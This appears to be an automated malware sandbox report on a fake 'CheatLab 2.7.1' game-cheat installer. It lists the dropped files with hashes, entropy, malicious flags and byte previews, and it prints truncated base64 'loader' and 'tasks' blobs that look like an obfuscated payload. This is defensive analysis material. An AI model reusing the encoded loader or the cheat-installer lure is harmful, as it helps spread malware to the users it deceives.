                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1070058901
                                                                                                                                                                                                                            Entropy (8bit):0.008758649776996388
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:
                                                                                                                                                                                                                            MD5:A8A24AF1D9E83BE788BD28D64967FE32
                                                                                                                                                                                                                            SHA1:BA48D37C5F714ECA8AF108A5508D8AD17FC14BE5
                                                                                                                                                                                                                            SHA-256:43ADFA84C5AC7F2A3BD99AD084580A503F17E5060A92D9F4FC6C58E5A59DA266
                                                                                                                                                                                                                            SHA-512:45D6DE4473000E09906AD7D359B3E9B3B84D5FFB4AC7E8BE69EA34170E3CD498BCAC96C49109C6EB23ABCFEF0D159B444D42638E5E6A972EB015CEADF2A4141F
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............^..^..^..8^..^..)^.^...^D..^.w.^..^...^..^..^...^..)^..^..<^..^Rich..^........PE..L....=Ce.........................................@.................................................................................................L...H0..............................................................P............................text...=........................... ..`.reloc..W$.......&.................. ..`.rdata..pP.......R..................@..@.data...H....P...t... ..............@....qbjfz..........L...............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\Pictures\9E146BE9C76A4720BCDB53011B87BD06.json

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2072
                                                                                                                                                                                                                            Entropy (8bit):3.9566449661490495
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:YttajcpXJ0gvxWr6cTnXRfhZa8lMHV9fEgS:styAXPsnBZcuWcgS
                                                                                                                                                                                                                            MD5:C4900FFF328F638455C25D11E43B106E
                                                                                                                                                                                                                            SHA1:6B86501D2B74ED99BE8BC9453348B4A78243557B
                                                                                                                                                                                                                            SHA-256:C6D61CDF586A6C6B51871D10F7D59F47C05C8D9EC1DBE40719EFD20F1B4E23DA
                                                                                                                                                                                                                            SHA-512:DB23877A8FD963D30568819B115978840C2A48E593872903035EDF179FBE749193BB5CD5528C07C6B6581E3F7D6475E9097DF9452BA8E4F46FC91CBAEBD0800E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTEsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsODUsOTUsODUsOTUsODgsNzIsNTgsNWIsZTMsYjcsYjAsYTUsYzMsZGYsNmUsOGMsOGIsYzgsY2MsZGMsYzcsYjUsNzAsOTQsN2MsZTEsYWMsZDksYWYsOTksYTYsNjMsOGIsODMsZDAsODcsY2MsYWIsYjAsYWQsOTIsN2QsNmYsNTMsOGYsZGEsNmMsYjcsZGQsYzYsYzksZDksODIsYTcsYTcsZDcsY2YsZGYsYmQsZGMsYTcsNTYsNWUsNjEsNzMsZDYsYzksYzYsY2MsYmIsYWIsNWIsYWEsNjMsYjUsOTIsYmEsZGYsYjEsY2YsOTcsNzQsN2MsY2YsY2IsOWMsYTksOTYsOTQsOGQsN2MsYTMsNjMsNTYsYTIsYTYsYzMsZDYsYmUsZDgsY2MsYWIsYTYsOWMsZDUsNjUsODksNTEsN2YsZTks","tasks":"OTMsYjQsOTIsYWMsYjMsNTMsODgsOGMsODMsODYsOWQsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZDYsODQsOTYsODksN2MsNmUsNmYsYTksNzcsODIsNjgsODAsOWMsODQsODYsOWIsODYsOT

                                                                                                                                                                                                                            C:\Windows\Installer\6cf1b5.msi

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {17BFB2C4-7970-46E7-9C69-EB98D896BBF9}, Number of Words: 2, Subject: CheatLab 2.7.1, Author: CheatLab Corp., Name of Creating Application: CheatLab 2.7.1, Template: x64;2057, Comments: This installer database contains the logic and data required to install CheatLab 2.7.1., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2820608
                                                                                                                                                                                                                            Entropy (8bit):6.925893502555434
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:xIjRd5W8zBQSc0ZnSKxZKumZrDq4Fb6HXr1iWnYs4ntHurpllQ6aBuxtZaeGisGg:020ZnHKbFnWnwuxCeGiZDal
                                                                                                                                                                                                                            MD5:B48140E9F5FD148E60A91B241800924F
                                                                                                                                                                                                                            SHA1:240EAFDBF53006595E5D99C397B838E20C1F6B3D
                                                                                                                                                                                                                            SHA-256:29C3776283532730C47223FCCC1E347DAF777570C8FC87A22740664AAA61790B
                                                                                                                                                                                                                            SHA-512:F4727AD6F990FABC855A94963B22E5E0ACFBF62270589AACA13763CC7641C3770E2520BBE43B2554EE00821D18AD03F632AAE369D1D0FB351CF4C29E18C4C127
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......................>...................,...................................Z.......W.......................................................T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...f...g...h.......v...................................................................................................................................................................................................................................................................................................................T...........#...0............................................................................................... ...!...".../...$.......&...'...(...)...*...+...,...-.......6...1...B...2...3...4...5...8...7...?...9...:...;...<...=...>.......@...A...S...C...D...E...F...G.......I...J...K...L...M...N...O...P...Q...R.......U.......V...W...X...Y...........\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                                                                                                                                            C:\Windows\Installer\MSIF35B.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Installer\MSIF3BA.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Installer\MSIF3EA.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Installer\MSIF458.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):785927
                                                                                                                                                                                                                            Entropy (8bit):6.5197834883886205
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:8aHRuEs3Xmm9DZEyaHRuEs3Xmm9DZEfMvZx0FlS68zBQSncb4ZPQTpAjZxqO17:825snmmtZR25snmmtZsMvZCFlp8zBQSB
                                                                                                                                                                                                                            MD5:42F7C9919450872036DAF1DBF4A08245
                                                                                                                                                                                                                            SHA1:71C1070421CC64DBE2B73014250C408C87A6DF74
                                                                                                                                                                                                                            SHA-256:9B81AC7EDBF488F198B93258097D9A022B775B80021E1ABA618BA2C53B2AF199
                                                                                                                                                                                                                            SHA-512:A5CC2901C34EF86DBBA3E7F0BA8A2BC4AB8E2BDCDE6AD1DE0757E0543FCE5E95E5C5A334ABE26DBB0545016155E63145D46009CC8290CF3C9DA0D8979A5A08EB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:...@IXOS.@.....@e.dW.@.....@.....@.....@.....@.....@......&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}..CheatLab 2.7.1..Cheat.Lab.2.7.1.msi.@.....@.....@.....@........&.{17BFB2C4-7970-46E7-9C69-EB98D896BBF9}.....@.....@.....@.....@.......@.....@.....@.......@......CheatLab 2.7.1......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{7285EAEC-8503-4760-A351-B9914BE2072E}..C:\Program Files\CheatLab Corp\CheatLab 2.7.1\.@.......@.....@.....@......&.{782A455A-F17F-4F83-B43B-519E5CD02E50}2.22:\Software\CheatLab Corp.\CheatLab 2.7.1\Version.@.......@.....@.....@......&.{C63D9F59-1705-40C1-B07A-EB81FFC1E687}:.C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua.@.......@.....@.....@......&.{1C2DE547-5DF6-4AF7-9AB2-B1A94C1961C8}8.C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe.@.......@.....@.....@........AI_RollbackTasks21.Rolling back scheduled task on th

                                                                                                                                                                                                                            C:\Windows\Installer\MSIF459.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):191968
                                                                                                                                                                                                                            Entropy (8bit):6.4059654303545885
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                                                                                                                                                                                            MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                                                                                                                                                                                            SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                                                                                                                                                                                            SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                                                                                                                                                                                            SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Installer\MSIF4F6.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):191968
                                                                                                                                                                                                                            Entropy (8bit):6.4059654303545885
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                                                                                                                                                                                            MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                                                                                                                                                                                            SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                                                                                                                                                                                            SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                                                                                                                                                                                            SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Installer\MSIF5A3.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):399328
                                                                                                                                                                                                                            Entropy (8bit):6.589290025452677
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:gMvZx0Flyv/UB8zBQSnuJnO6n4ZSaHwLvFnNLqrFWeyp1uBxfAOT3VDqO1:gMvZx0FlS68zBQSncb4ZPQTpAjZxqO1
                                                                                                                                                                                                                            MD5:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                                                                            SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                                                                                            SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                                                                                                            SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Installer\MSIFEEB.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):446944
                                                                                                                                                                                                                            Entropy (8bit):6.403916470886214
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                                                                                                                                                                                            MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                                                                                                                                                                                            SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                                                                                                                                                                                            SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                                                                                                                                                                                            SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Installer\SourceHash{2FA33EFE-BC43-4800-9FEF-38C5B173194D}

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                            Entropy (8bit):1.166920840305042
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:JSbX72FjuGiAGiLIlHVRp+h/7777777777777777777777777vDHF2ueh8aE1l0G:JiQI5W8h8aXF
                                                                                                                                                                                                                            MD5:2B98CAC0FD7CA5A171EF383EA31CC510
                                                                                                                                                                                                                            SHA1:8A03931AEF00DE1808D8C8386A0E251CD03E1F41
                                                                                                                                                                                                                            SHA-256:F2F5B529733B4A0E6B1050B3B8F5FA426F069ACD31DF79DEE51FFB85289EDCC8
                                                                                                                                                                                                                            SHA-512:2A5820F2CA6A3424CCDE75A5E9B44F4A081D13C7EDE91E865B7EB25173C0D621C4BC4BB4B110988510EE9A963AEE8F5A1283D24690D59AA5E90542DCD10C99CD
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Installer\inprogressinstallinfo.ipi

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                            Entropy (8bit):1.5914343814580825
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:G8PhXuRc06WXJujT5tSTdtRfSkdtR2VAEkrCyJ/oHuoxM2dtR2SkdtRaTKuz:ZhX1FjTujRfnR2eRCiQ5R2nRti
                                                                                                                                                                                                                            MD5:BC31E9B32FADD2F90A1E40E4ECA3F561
                                                                                                                                                                                                                            SHA1:9A3104E744FA9C9861591CB64F97D5BBE4573A5C
                                                                                                                                                                                                                            SHA-256:7980C490BBFAD6B55ED957DC965A754F7984A0DA6C744B1932190F12B400F6DE
                                                                                                                                                                                                                            SHA-512:5E1BE1CA23604B6C3153FB5B200F42A0BAA027DFEE56639FD2CCA8A769B2BE8CFAB6DF711FB132239F9545250A83B17D7B75B67349DC06D521DE281BF8DCB2DE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):432221
                                                                                                                                                                                                                            Entropy (8bit):5.375169248028408
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauN:zTtbmkExhMJCIpErE
                                                                                                                                                                                                                            MD5:44534A451AE999CE91DD8A2D9C006028
                                                                                                                                                                                                                            SHA1:E94EEFF599FF3F627C7934BD3AE16F9941FB340A
                                                                                                                                                                                                                            SHA-256:6233F9C986C0106ABB872DD908004D71C311581CC54BF4C5BFC6CDFFE7CE05EC
                                                                                                                                                                                                                            SHA-512:F8777CD21369B9CFD7C9E0150C86C1D3E910CAFB6D57F7C2AF898146618BA710F5044115FABD402209F3A018F80DF93207FE0ADB02CD536B037CE4CDD604EF53
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                                                                                                                                                                                            C:\Windows\Temp\~DF2462C61915B54F73.TMP

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):512
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3::
                                                                                                                                                                                                                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Temp\~DF388D4E4968FA1330.TMP

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                            Entropy (8bit):1.5914343814580825
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:G8PhXuRc06WXJujT5tSTdtRfSkdtR2VAEkrCyJ/oHuoxM2dtR2SkdtRaTKuz:ZhX1FjTujRfnR2eRCiQ5R2nRti
                                                                                                                                                                                                                            MD5:BC31E9B32FADD2F90A1E40E4ECA3F561
                                                                                                                                                                                                                            SHA1:9A3104E744FA9C9861591CB64F97D5BBE4573A5C
                                                                                                                                                                                                                            SHA-256:7980C490BBFAD6B55ED957DC965A754F7984A0DA6C744B1932190F12B400F6DE
                                                                                                                                                                                                                            SHA-512:5E1BE1CA23604B6C3153FB5B200F42A0BAA027DFEE56639FD2CCA8A769B2BE8CFAB6DF711FB132239F9545250A83B17D7B75B67349DC06D521DE281BF8DCB2DE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Windows\Temp\~DF4BDD10CBDE0B73E6.TMP

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                            Entropy (8bit):1.2725209870677356
                                                                                                                                                                                                                            Encrypted:false
